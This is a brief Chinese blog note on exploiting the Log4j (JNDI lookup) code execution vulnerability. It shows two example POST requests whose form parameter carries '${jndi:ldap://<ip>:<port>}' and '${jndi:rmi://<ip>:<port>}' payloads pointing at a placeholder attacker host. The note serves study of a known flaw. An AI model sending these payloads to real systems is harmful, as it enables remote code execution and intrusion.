【笔记】Log4j代码执行漏洞利用 发表于 2024-07-17 更新于 2025-12-19 阅读次数: 前言Log4j由反序列化漏洞引起的代码执行漏洞利用 漏洞利用 如果处理的方法中调用Log4j输出日志,且接收了请求参数作为变量,则可以修改请求参数为payload request1234POST http://127.0.0.1:80/Content-Type: application/x-www-form-urlencodedx="${jndi:ldap://<ip>:<port>}" request1234POST http://127.0.0.1:80/Content-Type: application/x-www-form-urlencodedx="${jndi:rmi://<ip>:<port>}" 漏洞利用组合JNDI注入 完成